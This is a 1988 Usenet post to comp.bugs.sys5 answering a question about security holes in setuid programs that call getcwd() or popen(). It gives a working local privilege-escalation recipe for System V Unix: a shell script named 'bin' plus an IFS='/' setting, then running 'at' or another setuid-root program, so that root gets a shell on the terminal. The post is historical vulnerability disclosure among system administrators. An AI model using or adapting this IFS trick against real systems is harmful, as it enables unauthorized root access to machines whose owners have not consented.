Path: utzoo!mnetor!uunet!mcvax!unido!cosmo!jum
From: jum@cosmo.UUCP (Uwe Mager)
Newsgroups: comp.bugs.sys5
Subject: Re: A security hole
Message-ID: <892@cosmo.UUCP>
Date: 11 Mar 88 01:30:22 GMT
References: <181@wsccs.UUCP> <722@rivm05.UUCP> <478@minya.UUCP>
Reply-To: jum@cosmo.UUCP (Jens-Uwe Mager(sysop))
Organization: CosmoNet Kommunikationssysteme GmbH, D-300 Hannover, West Germany
Lines: 23

In article <478@minya.UUCP> jc@minya.UUCP (John Chambers) writes:
...
>
>Anyhow, what can one do with getcwd() or popen() within a setuid program
>(root or otherwise) that isn't a consequence of the search path?  If there
>is a real security hole here, I'd be very interested in reading about it.

There is a nice hack to make the sh misunderstood the path variable.
For example the following will work on most SYSV machines:
in file named ``bin'' in your cwd:

IFS=" \t\n" # escapes for readability
/bin/sh </dev/tty >/dev/tty 2>&1
pwd

and now from a command line:
IFS="/"; export IFS
at now + 1 minute # or any setuid root containing getcwd

This will not work with the Korn shell, there is a special check for IFS.
-- 
Jens-Uwe Mager
jum@focus.UUCP || jum@cosmo.UUCP